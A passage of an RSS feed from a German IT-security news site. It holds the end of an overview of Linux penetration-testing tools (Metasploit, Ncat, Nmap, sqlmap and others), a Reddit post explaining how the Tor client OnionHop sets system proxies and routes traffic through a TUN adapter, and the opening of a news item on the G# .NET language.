<p class="wp-block-paragraph">Metasploit ist ein Exploit-Framework von Rapid7, das für allgemeine Penetrationstests und Schwachstellenbewertungen verwendet wird. Sicherheitsexperten betrachten es als “Super-Tool”, das funktionierende Versionen fast aller bekannter Exploits enthält. Metasploit ermöglicht Sicherheitsexperten, Netzwerke und Endpunkte auf Schwachstellen zu scannen und anschließend automatisiert mögliche Exploits auszuführen, um Systeme zu übernehmen.</p>



<p class="wp-block-paragraph">Metasploit erleichtert es mit protokollspezifischen Modulen (die alle unter der Funktion Auxiliary/Server/Capture laufen) Anmeldeinformationen zu erfassen. Sicherheitsexperten können jedes dieser Module einzeln starten und konfigurieren – zudem steht ein Capture-Plug-in zur Verfügung, das diesen Prozess vereinheitlicht.</p>



<p class="wp-block-paragraph"><strong>Preis:</strong> Metasploit Pro kostet – inklusive kommerziellem Support durch Rapid7 – ab 12.000 Dollar pro Jahr. Es gibt aber auch eine kostenlose Version.</p>



<h2 class="wp-block-heading">5. <a href="https://nmap.org/ncat/" target="_blank" rel="noreferrer noopener">Ncat</a></h2>



<p class="wp-block-paragraph">Der Nachfolger des beliebten Tools Netcat heißt Ncat und kommt von den Machern von Nmap. Das Tool ermöglicht es, Daten per Kommandozeile über ein Netzwerk zu lesen und zu schreiben, bietet aber auch zusätzlich Funktionen wie SSL-Verschlüsselung. Sicherheitsexperten zufolge ist Ncat unerlässlich geworden, um TCP/UDP-Clients und -Server zu hosten und Daten von Angreifer- und Opfersystemen zu empfangen.</p>



<p class="wp-block-paragraph">Ncat ist auch ein beliebtes Tool, um eine Reverse Shell einzurichten oder Daten zu exfiltrieren. Es wurde als zuverlässiges Back-End-Tool entwickelt, um Netzwerkverbindungen zu anderen Anwendungen und Benutzern herzustellen.</p>



<p class="wp-block-paragraph"><strong>Preis:</strong> kostenlos</p>



<h2 class="wp-block-heading">6. <a href="https://nmap.org/" target="_blank" rel="noreferrer noopener">Nmap</a></h2>



<p class="wp-block-paragraph">Dieses Netzwerk-Scanning- und Mapping-Tool auf Kommandozeilen-Basis findet zugängliche Ports auf Remote Devices. Viele Sicherheitsexperten halten Nmap für eines der wichtigsten und effektivsten Tools – insbesondere im Bereich Penetration Testing ist es unerlässlich.</p>



<p class="wp-block-paragraph">Die Skripting-Engine von Nmap erkennt anschließend automatisiert weitere Schwachstellen und nutzt diese aus. Nmap unterstützt Dutzende fortschrittlicher Techniken, um Netzwerke mit IP-Filtern, Firewalls, Routern und anderen Hindernissen abzubilden. Dazu gehören auch zahlreiche Mechanismen, um TCP- und UDP-Ports zu scannen, Betriebssysteme und Versionen sowie Ping-Sweeps zu erkennen.</p>



<p class="wp-block-paragraph"><strong>Preis:</strong> kostenlos</p>



<h2 class="wp-block-heading">7. <a href="https://github.com/haad/proxychains" target="_blank" rel="noreferrer noopener">ProxyChains</a></h2>



<p class="wp-block-paragraph">Dieses Werkzeug – der De-facto-Standard für Netzwerk-Tunneling – ermöglicht es Sicherheitsexperten, Proxy-Befehle von ihrem angreifenden <a href="https://www.computerwoche.de/k/linux-open-source,3472" target="_blank" class="idgGlossaryLink">Linux</a>-Rechner aus über verschiedene kompromittierte Rechner zu senden, um Netzwerkgrenzen und Firewalls zu überwinden und dabei einer Entdeckung zu entgehen.</p>



<p class="wp-block-paragraph">ProxyChains leitet den TCP-Verkehr von Penetrationstestern durch die folgenden Proxys: TOR, SOCKS und HTTP. ProxyChains ist mit TCP-Aufklärungs-Tools wie NMAP kompatibel und verwendet standardmäßig das TOR-Netzwerk. Sicherheitsexperten verwenden ProxyChains auch bei der IDS/IPS-Erkennung.</p>



<p class="wp-block-paragraph"><strong>Preis:</strong> kostenlos</p>



<h2 class="wp-block-heading">8. <a href="https://github.com/SpiderLabs/Responder" target="_blank" rel="noreferrer noopener">Responder</a></h2>



<p class="wp-block-paragraph">Responder ist ein NBT-NS (NetBIOS Name Service), LLMNR (Link-Local Multicast Name Resolution) und mDNS (Multicast DNS) Poisoner. Penetration Tester nutzen das Tool, um Angriffe zu simulieren, die darauf abzielen, Anmeldeinformationen und andere Daten während des Prozesses der Namensauflösung zu stehlen, wenn der DNS-Server keinen Eintrag findet. Ab Version 3.1.1.0 bietet Responder standardmäßig vollen IPv6-Support.</p>



<p class="wp-block-paragraph"><strong>Preis:</strong> kostenlos</p>



<h2 class="wp-block-heading">9. <a href="https://sqlmap.org/" target="_blank" rel="noreferrer noopener">sqlmap</a></h2>



<p class="wp-block-paragraph">Das <a class="idgGlossaryLink" href="https://www.computerwoche.de/k/linux-open-source,3472" target="_blank">Open-Source</a>-Tool sqlmap richtet sich ebenfalls an Penetrationstester und automatisiert den Prozess, SQL-Injection-Fehler zu erkennen, mit deren Hilfe Datenbankserver kompromittiert werden könnten. Das Tool verfügt über eine leistungsstarke Erkennungs-Engine und bietet zahlreiche Funktionen, darunter Datenbank-Fingerprinting und die Ausführung von Befehlen auf Betriebssystemebene über Out-of-Band-Verbindungen.</p>



<p class="wp-block-paragraph">Sqlmap unterstützt eine breite Palette von Datenbankservern, darunter:</p>



<ul class="wp-block-list">
<li><p>MySQL,</p></li>



<li><p>Oracle,</p></li>



<li><p>PostgreSQL,</p></li>



<li><p>Microsoft SQL Server,</p></li>



<li><p>Microsoft Access,</p></li>



<li><p>IBM DB2,</p></li>



<li><p>SQLite,</p></li>



<li><p>Firebird,</p></li>



<li><p>Sybase,</p></li>



<li><p>SAP MaxDB und</p></li>



<li><p>HSQLDB.</p></li>
</ul>



<p class="wp-block-paragraph"><strong>Preis:</strong> kostenlos</p>



<h2 class="wp-block-heading">10. <a href="https://www.wireshark.org/" target="_blank" rel="noreferrer noopener">Wireshark</a></h2>



<p class="wp-block-paragraph">Das Netzwerkprotokoll-Analyse-Tool Wireshark wird auch oft als Network Interface Sniffer bezeichnet. Mit Wireshark können Sicherheitsexperten das Netzwerkverhalten eines Geräts beobachten, um zu sehen, mit welchen anderen Geräten es kommuniziert und warum.</p>



<p class="wp-block-paragraph">Sicherheitsexperten zufolge eignet sich Wireshark hervorragend, um herauszufinden, wo sich DNS-Server und andere Dienste befinden, mit denen sich ein Netzwerk weiter kompromittieren lässt. Wireshark läuft nicht nur unter <a href="https://www.computerwoche.de/k/linux-open-source,3472" target="_blank" class="idgGlossaryLink">Linux</a>, sondern funktioniert mit den allen gängigen Betriebssystemen, einschließlich <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a>, MacOs und Unix.</p>



<p class="wp-block-paragraph"><strong>Preis:</strong> kostenlos </p>



<p class="wp-block-paragraph">(fm)</p>



<p class="wp-block-paragraph"><strong>Dieser Beitrag ist <a href="https://www.networkworld.com/article/970926/10-essential-linux-security-tools-for-network-professionals-and-security-practitioners.html" target="_blank">im Original</a> bei unserer Schwesterpublikation Networkworld.com erschienen.</strong></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Digitale Selbstbestimmung: OnionHop leitet euren gesamten Datenverkehr durch das Tor-Netzwerk (Linux/Win/Mac)]]></title>
<description><![CDATA[OnionHop – Überblick OnionHop — route your traffic through Tor, with clear controls ist ein moderner plattformübergreifender Desktop-Client (für Windows, Linux und macOS) mit starkem Fokus auf Privatsphäre. Er ermöglicht es Nutzern, ihren Datenverkehr über das Tor-Netzwerk zu leiten. Es handelt s...]]></description>
<link>https://tsecurity.de/de/3687868/it-security-nachrichten/digitale-selbstbestimmung-onionhop-leitet-euren-gesamten-datenverkehr-durch-das-tor-netzwerk-linuxwinmac/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687868/it-security-nachrichten/digitale-selbstbestimmung-onionhop-leitet-euren-gesamten-datenverkehr-durch-das-tor-netzwerk-linuxwinmac/</guid>
<pubDate>Thu, 23 Jul 2026 04:14:01 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><h1>OnionHop – Überblick</h1> <p><a href="https://www.onionhop.de/">OnionHop — route your traffic through Tor, with clear controls</a> ist ein moderner plattformübergreifender Desktop-Client (für Windows, Linux und macOS) mit starkem Fokus auf Privatsphäre. Er ermöglicht es Nutzern, ihren Datenverkehr über das Tor-Netzwerk zu leiten. Es handelt sich um ein unabhängiges Open-Source-Projekt, das nicht offiziell mit dem <a href="https://www.torproject.org/">Tor Project | Anonymity Online</a> verbunden ist. Die OnionHop Oberfläche bietet 8 Sprachen (Englisch, Deutsch, Französisch, Chinesisch, Russisch, Persisch, Aserbaidschanisch und Sorani Kurdisch).</p> <p>Melden Sie sich freiwillig als Snowflake-Proxy helfen Sie zensierten Benutzern, Tor direkt von den Einstellungen aus zu erreichen (siehe Einstellungen).</p> <h1>Hauptfunktionen</h1> <ul> <li><strong>Proxy-Modus:</strong> Leitet den Datenverkehr ressourcenschonend über einen lokalen SOCKS-Proxy um, ohne dass Administratorrechte benötigt werden. Ein Knopfdruck auf "System Proxy: On" und alle gängigen Browser benutzen das Tor Netzwerk.</li> <li><strong>TUN-Modus (eigene virutelle Netzwerkkarte):</strong> Leitet den Datenverkehr des gesamten Systems (alle Apps) mit einem Klick über das Tor-Netzwerk um.</li> <li><strong>Split-Tunneling:</strong> Ermöglicht die individuelle Auswahl, welche Apps über Tor laufen und welche direkte Verbindungen nutzen.</li> <li><strong>Kill-Switch:</strong> Blockiert den ausgehenden Datenverkehr sofort, wenn die Tor-Verbindung abbricht, um ungeschützte Datenlecks zu verhindern.</li> <li><strong>DNS-Steuerung:</strong> Erzwingt DNS-Anfragen über Tor und verhindert Lecks zum Internetanbieter (inklusive QUIC/UDP-Leckschutz).</li> <li><strong>Länder- &amp; Seiten-Routing:</strong> Erlaubt direkte Verbindungen für bestimmte Länder oder das Blockieren von Domains basierend auf automatisch aktualisierten Listen.</li> <li><strong>CLI-Client:</strong> Bietet eine Kommandozeilenversion ohne grafische Oberfläche, ideal für Server und Automatisierungen. Zensurumgehung und Netzwerktechnologien</li> <li><strong>Smart Connect:</strong> Wählt automatisch die optimale Engine, Route und Bridge für das aktuelle Netzwerk.</li> <li><strong>Integrierter Bridge-Scanner:</strong> Sucht und testet automatisch funktionierende Brücken (Bridges) in restriktiven Netzwerken, sodass keine manuelle Eingabe erforderlich ist.</li> <li><strong>Pluggable Transports:</strong> Unterstützt Protokolle wie obfs4, snowflake, webtunnel, conjure, meek, dnstt und vanilla, um Netzwerkblockaden zu umgehen.</li> <li><strong>Tor-Engines:</strong> Nutzt Classic (tor), Arti (<a href="https://gitlab.torproject.org/tpo/core/arti/-/blob/main/CHANGELOG.md"><em>A Rust Tor Implementation</em></a> <em>(Gitlab Changelog) oder</em> <a href="https://arti.torproject.org/"><em>https://arti.torproject.org/</em></a> <em>für die Nerds</em> <a href="https://dspacemainprd01.lib.uwaterloo.ca/server/api/core/bitstreams/538e4dac-759f-4677-a8f6-10cc83482165/content#:~:text=We%20illustrate%20an%20example%20of%20this%20occurrence,our%20proposal%2C%20and%20details%20about%20its%20implementation">Improving Tor using a TCP-over-DTLS Tunnel (PDF, englisch)</a><em>, bald schon mit UDP Unterstützung</em> <a href="https://spec.torproject.org/proposals/348-udp-app-support.html">339 / 348-udp-app-support - Tor design proposals</a> <em>(Tor Architektur), dies ist die Zukunft von Tor, weg von C mit seinen historisch vielen Buffer Overflows ~65% aller Tor Sicherheitslücken, mit RPC-Schnittstelle (Remote Procedure Call / Methodenaufruf auf entfernten Systemen / Software) und UDP für moderne Anwendungen)</em></li> </ul> <p>Da Transparenz bei Software für die informationelle Selbstbestimmung das Wichtigste ist, ist das gesamte Projekt <strong>quelloffen (Open Source)</strong>. Ihr könnt euch den Quellcode jederzeit auf GitHub ansehen, ihn selbst kompilieren oder Code-Überprüfungen (Code Reviews) durchführen:</p> <p>👉 <strong>GitHub-Repository:</strong> <a href="https://github.com/center2055/OnionHop">center2055/OnionHop: Privacy-first Desktop app that routes your traffic through Tor - Anonymous browsing made simple</a></p> <p>Die Software steht für <strong>Linux, Windows und macOS</strong> zur Verfügung (es gibt auch tragbare Versionen, die nicht installiert werden müssen). <strong>Neben</strong> der <strong>grafischen Oberfläche</strong> gibt es für Automatisierungen auch eine <strong>reine Kommandozeilen-Version (CLI)</strong>.</p> <h1>Systemweite Socks5 Proxy vs. TUN VPN-Technik Modus mit eigener virtuellen Netzwerkkarte (TUN)</h1> <p>Um zu verstehen, warum der TUN oft sicherer ist, hilft ein direkter Vergleich:</p> <table><thead> <tr> <th align="left"><strong>Eigenschaft</strong></th> <th align="left"><strong>Systemweiter Vermittlungsserver (System SOCKS5</strong> <strong>Proxy)</strong></th> <th align="left"><strong>TUN "Netzwerktunnel"(OSI Layer 3</strong>) <strong>"virtuellen Netzwerkadapter" nicht TAP wie bei VPN Layer 2</strong></th> </tr> </thead><tbody> <tr> <td align="left"><strong>Arbeitsweise</strong></td> <td align="left">Setzt darauf, dass Programme die Regeln des Betriebssystems respektieren und die Poststelle nutzen.</td> <td align="left">Zwingt den gesamten Netzwerkverkehr auf tiefer Ebene durch einen Trichter.</td> </tr> <tr> <td align="left"><strong>Zuverlässigkeit</strong></td> <td align="left">Manche Programme (z. B. bestimmte Spiele oder Hintergrunddienste) ignorieren diese Einstellungen und funken direkt ins Internet.</td> <td align="left">Fängt alles ab, völlig unabhängig davon, wie das einzelne Programm programmiert ist.</td> </tr> <tr> <td align="left"><strong>Schutz vor Datenlecks</strong></td> <td align="left">Es kann vorkommen, dass Informationen (wie Adressanfragen) ungeschützt nach außen dringen (Datenlecks).</td> <td align="left">Bietet einen sehr hohen Schutz vor Datenlecks, da kein Datenpaket die Straßensperre umgehen kann. Eigenschaft Systemweiter Vermittlungsserver (SOCK5 Proxy) TUN-ModusArbeitsweise Setzt darauf, dass Programme die Regeln des Betriebssystems respektieren und die Poststelle nutzen. Zwingt den gesamten Netzwerkverkehr auf tiefer Ebene durch einen Trichter. Zuverlässigkeit Manche Programme (z. B. bestimmte Spiele oder Hintergrunddienste) ignorieren diese Einstellungen und funken direkt ins Internet. Fängt alles ab, völlig unabhängig davon, wie das einzelne Programm programmiert ist. Schutz vor Datenlecks Es kann vorkommen, dass Informationen (wie Adressanfragen) ungeschützt nach außen dringen (Datenlecks). Bietet einen sehr hohen Schutz vor Datenlecks, da kein Datenpaket die Straßensperre umgehen kann.</td> </tr> </tbody></table> <p><strong>Zusammenfassung: Warum es beide Modi (System SOCKS5 Proxy und TUN) gibt</strong></p> <p>Genau an diesem Punkt zeigt sich, warum Werkzeuge wie OnionHop unterschiedliche Modi anbieten müssen:</p> <ol> <li><strong>Der System SOCKS5 Proxy-Modus (Anwendung muss Socks5 fähig sein z.B. alle Internet Browser):</strong> Er ist sehr ressourcenschonend und leichtgewichtig. Er eignet sich hervorragend, wenn du gezielt nur die Anwendungen über das Tor-Netzwerk leiten möchtest, die diesen Standard unterstützen (wie deinen Browser).</li> <li><strong>Der TUN-Modus "virtuelle Netzwerkkarte":</strong> Er löst exakt das Problem der fehlenden Unterstützung in Programmen. Wie wir zuvor besprochen haben, baut dieser Modus eine **virtuelle Netzwerkkarte (**sichtbar unter "Netzwerkverbindungen" unter Windows, WIN + R = <code>ncpa.cpl)</code> auf und zwingt das Betriebssystem, <strong>alles</strong> dorthin zu leiten. Hierbei ist es völlig egal, ob ein Programm von Vermittlungsservern weiß oder nicht – die Daten werden auf einer Ebene abgefangen, der sich kein Programm entziehen kann.</li> </ol> <h1>Für die Entwickler unter euch: Wie ändert man den System-Proxy eigentlich programmatisch?</h1> <p>Wer schon länger in der Softwareentwicklung tätig ist, kennt das Problem bei der plattformübergreifenden Programmierung: Ein einheitliches Vorgehen gibt es hier leider nicht. Jedes Betriebssystem kocht sein eigenes Süppchen, was bei Werkzeugen wie OnionHop unter der Haube einigen Aufwand bedeutet. Hier ist ein kleiner technischer Einblick, wie der Code das im Hintergrund löst:</p> <p><strong>1. Windows: Die Registrierungsdatenbank und WinINet</strong> Einfach nur Werte in eine Konfigurationsdatei zu schreiben, reicht hier nicht. Zuerst müssen die Werte in der Registrierungsdatenbank (im Zweig <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings</code>) manipuliert werden (z. B. <code>ProxyEnable</code> auf <code>1</code> und <code>ProxyServer</code> auf <code>127.0.0.1:9050</code>). Der entscheidende Schritt ist danach aber, das System über diese Änderung zu benachrichtigen, da laufende Anwendungen (wie der Browser) die neuen Werte sonst ignorieren. Dafür muss ein Aufruf der Windows-Systembibliothek <code>wininet.dll</code> erfolgen. Über die Programmierschnittstelle (API) <code>InternetSetOption</code> feuert man die Markierungen (Flags) <code>INTERNET_OPTION_SETTINGS_CHANGED</code> und <code>INTERNET_OPTION_REFRESH</code> ab, um das System zum sofortigen Neuladen zu zwingen.</p> <p><strong>2. Linux: Die große Fragmentierung</strong> Gerade wenn man in hybriden Umgebungen (wie dem Windows-Subsystem für Linux oder mit Container-Lösungen) entwickelt, merkt man schnell: Linux hat keine zentrale Instanz für diese Einstellungen.</p> <ul> <li><strong>Kommandozeile und Hintergrunddienste:</strong> Diese reagieren fast ausschließlich auf Umgebungsvariablen wie <code>http_proxy</code> oder <code>ALL_PROXY</code>. Diese müssen durch das Programm systemweit oder in den jeweiligen Startskripten (z. B. <code>~/.bashrc</code>) gesetzt werden.</li> <li><strong>GNOME-Desktop:</strong> Hier wird die Konfigurationsdatenbank (dconf) genutzt. Programmatisch löst man das über die C-Programmierschnittstelle von GLib oder einfacher durch das Ausführen von Systembefehlen im Hintergrund (z. B. <code>gsettings set org.gnome.system.proxy mode 'manual'</code>).</li> <li><strong>KDE Plasma:</strong> Speichert die Konfiguration in Textdateien (<code>~/.config/kioslaverc</code>), die von der Software analysiert und editiert werden müssen, gefolgt von einem Befehl zum Neustart der zuständigen KDE-Dienste.</li> </ul> <p><strong>3. macOS: SystemConfiguration Framework</strong> Apple regelt das Netzwerkmanagement streng über die einzelnen Hardware-Schnittstellen (WLAN, Kabelnetzwerk etc.).</p> <ul> <li><strong>Der skriptbasierte Weg:</strong> Ein Programm ruft im Hintergrund das vorinstallierte Kommandozeilen-Werkzeug <code>networksetup</code> auf, um den Vermittlungsserver für jede aktive Netzwerkschnittstelle einzeln zu setzen (z. B. <code>networksetup -setsocksfirewallproxy "Wi-Fi"</code> <a href="http://127.0.0.1/"><code>127.0.0.1</code></a> <code>9050</code>).</li> <li><strong>Der native Weg:</strong> Die Software greift direkt über C oder Swift auf das Systemgerüst <code>SystemConfiguration</code> zu. Über die Programmierschnittstelle <code>SCDynamicStore</code> klinkt man sich in den Konfigurationsspeicher ein, schreibt ein Datenverzeichnis mit den neuen Werten in den Pfad <code>State:/Network/Global/Proxies</code> und teilt so dem Kernel die Netzwerkänderung ohne Umwege direkt mit.</li> </ul> <h1>Wie Onionhop unter Windows den Datenverkehr über virtuelle Netzwerkschnittstellen (TUN) lenkt</h1> <p>Die Magie passiert über <strong>virtuelle Netzwerkschnittstellen (TUN-Modus)</strong> und gezielte Manipulation der <strong>Wegfindung (Routing)</strong>.</p> <h1>1. Der virtuelle Netzwerktreiber</h1> <p>Windows nutzt für Netzwerkkarten die sogenannte <em>Network Driver Interface Specification</em> (NDIS). Tools wie Onionhop installieren einen virtuellen Treiber (oft auf Basis von Wintun).</p> <p>Auf der Ebene des <strong>Betriebssystemkerns (Kernel-Ebene)</strong> ist dieser Treiber eine vollwertige Netzwerkkarte. Das System sieht absolut keinen Unterschied zu eurem echten WLAN-Modul oder Netzwerkkabel. Dieser Adapter arbeitet auf der <strong>Vermittlungsschicht (Layer 3)</strong>. Er verarbeitet also reine IP-Datenpakete (Internetprotokoll) und simuliert keine Hardware-Adressen (MAC-Adressen) der tieferen Schichten.</p> <h1>2. Die Übernahme der Wegfindung (Routing)</h1> <p>Damit Windows die Daten nicht ans WLAN, sondern an Onionhop schickt, wird die <strong>Wegfindungstabelle (Routingtabelle)</strong> dynamisch angepasst, sobald die Verbindung steht:</p> <ul> <li>Onionhop fügt eine neue Standardroute (<code>0.0.0.0/0</code> – also den Weg für "alle unbekannten Ziele im Internet") hinzu, die auf die virtuelle TUN-Schnittstelle zeigt.</li> <li>Der entscheidende Trick: Diese neue Route bekommt einen niedrigeren <strong>Prioritätswert (Metrik)</strong> als der echte WLAN-Adapter. Da Windows bei konkurrierenden Routen immer den Weg mit dem niedrigsten Wert wählt, fließt der gesamte ausgehende Datenverkehr des Systems ab sofort in den virtuellen Tunnel.</li> </ul> <h1>3. Datenkapselung im Anwendungsbereich (User-Space)</h1> <p>Jetzt landen die Daten (Nutzdaten) bei der Onionhop-Anwendung, die als Hintergrunddienst läuft:</p> <ol> <li>Die Anwendung lauscht an der virtuellen Schnittstelle und fängt die IP-Pakete ab.</li> <li>Sie verschlüsselt diese Nutzdaten.</li> <li>Die verschlüsselten Pakete werden nun mit einer neuen Ziel-IP versehen (dem ersten Knotenpunkt im Onion-Netzwerk). Das nennt man <strong>Datenkapselung (Encapsulation)</strong>.</li> <li>Erst jetzt übergibt Onionhop diese neu verpackten Pakete wieder an den Windows-Netzwerkstapel.</li> </ol> <p>Die Wegfindungstabelle von Windows sieht nun diese spezifische Ziel-IP des Einsteiger-Knotens und weiß: <em>"Ah, diese IP muss über das echte Standard-Gateway des physischen WLAN-Adapters raus."</em></p> <p>Der echte WLAN-Adapter dient also nur noch als reines Transportmedium für den bereits gekapselten und verschlüsselten Datenverkehr. Die eigentlichen Programme (wie der Browser) denken währenddessen, sie sprechen mit einer ganz normalen Netzwerkkarte.</p> <p><strong>Zum Selbstprüfen für die Kommandozeile:</strong></p> <p>Wer sich das beim Testen von Onionhop live ansehen will, kann die PowerShell nutzen:</p> <ul> <li><strong>Versteckte Schnittstellen anzeigen:</strong></li> <li><code>PowerShellGet-NetAdapter -IncludeHidden</code></li> <li><strong>Wegfindung und Prioritäten prüfen:</strong></li> <li><code>PowerShellGet-NetRoute -DestinationPrefix "0.0.0.0/0"</code></li> </ul> <h1>Was ist die Abgrenzung zu einem "echten" VPN wie z.B. ProtonVPN?</h1> <table><thead> <tr> <th align="left"><strong>Eigenschaft</strong></th> <th align="left"><strong>OnionHop (Tor-Netzwerk)</strong></th> <th align="left"><strong>Klassisches VPN (z.B. ProtonVPN)</strong></th> </tr> </thead><tbody> <tr> <td align="left"><strong>Architektur</strong></td> <td align="left"><strong>Dezentral.</strong> Deine Daten fließen über drei zufällige, weltweit verteilte Knotenpunkte.</td> <td align="left"><strong>Zentralisiert.</strong> Deine Daten fließen direkt durch einen festen Server des VPN-Anbieters.</td> </tr> <tr> <td align="left"><strong>Vertrauensmodell</strong></td> <td align="left"><strong>Trustless.</strong> Du musst niemandem vertrauen. Der erste Knoten kennt dich (aber nicht das Ziel), der letzte Knoten kennt das Ziel (aber nicht dich).</td> <td align="left"><strong>Vertrauensbasiert.</strong> Du musst deinem VPN Anbieter zu 100 % vertrauen, da sie deinen gesamten unverschlüsselten Datenverkehr sehen können.</td> </tr> <tr> <td align="left"><strong>Protokolle</strong></td> <td align="left">Tor transportiert prinzipbedingt <strong>nur TCP-Verbindungen</strong>. UDP (wichtig für Online-Spiele oder VoIP) wird blockiert.</td> <td align="left">Überträgt TCP, UDP und oft auch ICMP (Ping) vollständig. Eigenschaft OnionHop (Tor-Netzwerk) Klassisches VPN (z.B. ProtonVPN) Architektur Dezentral. Deine Daten fließen über drei zufällige, weltweit verteilte Knotenpunkte. Zentralisiert. Deine Daten fließen direkt durch einen festen Server des VPN-Anbieters. Vertrauensmodell Trustless. Du musst niemandem vertrauen. Der erste Knoten kennt dich (aber nicht das Ziel), der letzte Knoten kennt das Ziel (aber nicht dich). Vertrauensbasiert. Du musst deinem VPN Anbieter zu 100 % vertrauen, da sie deinen gesamten unverschlüsselten Datenverkehr sehen können.Protokolle Tor transportiert prinzipbedingt nur TCP-Verbindungen. UDP (wichtig für Online-Spiele oder VoIP) wird blockiert. Überträgt TCP, UDP und oft auch ICMP (Ping) vollständig.</td> </tr> </tbody></table> <h1>Das Virtuelle Private Netzwerk (VPN): Tiefer Eingriff auf Schicht 2 und 3</h1> <p>Ein VPN verhält sich für das Betriebssystem wie eine echte, physische Netzwerkkarte – nur eben als virtuelle Variante (Netzwerkschnittstelle). Es greift tief in das System ein und fängt den gesamten Datenverkehr ab, bevor dieser das Gerät verlässt.</p> <ul> <li><strong>Auf der Vermittlungsschicht (Schicht 3 / Network Layer):</strong> Hier arbeiten die meisten modernen VPN-Verbindungen (wie WireGuard oder IPsec). Sie verpacken (kapseln) komplette IP-Datenpakete. Das bedeutet, dass die gesamte Netzkopplung (Routing) übernommen wird. Jeder Datenverkehr – egal ob gesicherte Verbindungsaufbauten (TCP), verbindungslose Übertragungen (UDP) oder Diagnoseabfragen (ICMP, wie bei einem Ping) – wird in den verschlüsselten Tunnel gezwungen.</li> <li><strong>Auf der Sicherungsschicht (Schicht 2 / Data Link Layer):</strong> Einige VPN-Lösungen beherrschen auch die sogenannte Netzwerküberbrückung (Bridging, z. B. OpenVPN im TAP-Modus). Hier werden die rohen Datenrahmen (Ethernet Frames) übertragen. Das System verhält sich so, als wären alle Rechner über hunderte Kilometer hinweg an denselben physischen Netzwerkverteiler (Switch) angeschlossen. In diesem Modus werden sogar lokale Netzwerk-Rundrufe (Broadcasts) durch den Tunnel übertragen.</li> </ul> <h1>Das Zwiebelnetzwerk (Tor): Aufsatz auf Schicht 4 und 7</h1> <p>Tor arbeitet architektonisch völlig anders und hat mit den unteren Netzwerkschichten (Schicht 2 und 3) primär nichts zu tun. Es erstellt keine virtuelle Netzwerkkarte im Betriebssystem.</p> <ul> <li><strong>Anwendungsschicht (Schicht 7) &amp; Transportschicht (Schicht 4):</strong> Das Tor-Programm läuft lokal als Stellvertreter-Dienst (SOCKS-Proxy). Eure Software (z. B. der Browser) muss explizit so konfiguriert werden, dass sie diesen Stellvertreter anspricht. Tor nimmt diese Anfragen entgegen und wickelt den Datenstrom ausschließlich über die Transportschicht ab – und hier auch <strong>nur für das TCP-Protokoll</strong>.</li> <li><strong>Keine rohen Pakete:</strong> Tor transportiert keine IP-Datenpakete (Schicht 3) und keine Ethernet-Datenrahmen (Schicht 2). Verbindungslose UDP-Pakete oder simple Ping-Abfragen (ICMP) werden vom Tor-Netzwerk schlichtweg nicht weitergeleitet.</li> </ul> <h1>Die Konsequenz für die IT-Sicherheit (Datenlecks)</h1> <p>Aus Sicht der Informationssicherheit ergibt sich daraus ein massiver Unterschied im Gefahrenpotenzial:</p> <p>Da ein klassisches VPN auf der <strong>Vermittlungsschicht (Schicht 3)</strong> arbeitet, fängt es als Standard-Netzweg (Default Gateway) den <em>gesamten</em> Verkehr des Betriebssystems ein.</p> <p>Das Zwiebelnetzwerk hingegen ist stark anfällig für Datenlecks (Leakage), da es auf <strong>Schicht 4 und 7</strong> operiert. Wenn eine Anwendung auf dem Rechner nicht strikt an den Tor-Stellvertreter (Proxy) gebunden ist, oder wenn sie versucht, über das verbindungslose UDP-Protokoll eine Namensauflösung (DNS-Anfrage) durchzuführen, wandern diese Datenpakete unverschlüsselt am Zwiebelnetzwerk vorbei ins normale Internet. Eure echte IP-Adresse wäre in diesem Fall sofort enttarnt. Um Tor so abzusichern, dass es wie ein VPN den gesamten Rechnerverkehr schützt (auf Schicht 3 erzwingt), bedarf es spezialisierter Betriebssysteme wie <a href="https://tails.net/">Tails</a> oder dedizierter Hardware-Zwischenstationen.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Horus_Sirius"> /u/Horus_Sirius </a> <br> <span><a href="https://www.onionhop.de/">[link]</a></span>   <span><a href="https://www.reddit.com/r/Computersicherheit/comments/1v3vcph/digitale_selbstbestimmung_onionhop_leitet_euren/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[G# language for .NET borrows from Go, Kotlin, and Swift]]></title>
<description><![CDATA[G# (GSharp) is moving forward as a programming language for Microsoft’s .NET platform, touted as bringing Go-, Kotlin-, and Swift-style ergonomics to the CLR (Common Language Runtime). The language is described by its creators as modern, simple, and accessible.



Although pre-1.0 and still growi...]]></description>
<link>https://tsecurity.de/de/3687865/ai-nachrichten/g-language-for-net-borrows-from-go-kotlin-and-swift/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687865/ai-nachrichten/g-language-for-net-borrows-from-go-kotlin-and-swift/</guid>
<pubDate>Thu, 23 Jul 2026 04:08:47 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph"><a href="https://github.com/DavidObando/gsharp" data-type="link" data-id="https://github.com/DavidObando/gsharp">G# (GSharp)</a><strong> </strong>is moving forward as a programming language for Microsoft’s <a href="https://www.infoworld.com/article/2264488/what-is-the-net-framework-microsofts-answer-to-java.html">.NET</a> platform, touted as bringing <a href="https://www.infoworld.com/article/2253031/whats-the-go-language-really-good-for-3.html">Go</a>-, <a href="https://www.infoworld.com/article/2256390/what-is-kotlin-the-java-alternative-explained.html">Kotlin</a>-, and <a href="https://www.infoworld.com/article/4150248/swift-6-3-boosts-c-interoperability-android-sdk.html">Swift</a>-style ergonomics to the CLR (Common Language Runtime). The language is described by its creators as modern, simple, and accessible.</p>



<p class="wp-block-paragraph">Although pre-1.0 and still growing, G# aims to be for people who want a small, predictable language with direct access to the .NET ecosystem. Developers will see imports, <code>func</code>, structs, slices, maps, channels, <code>go</code>, <code>select</code>, and <code>for in</code> iteration. Also important are nullable flow, direct calls into the CLR (Common Language Runtime), and built-in concurrency. </p>



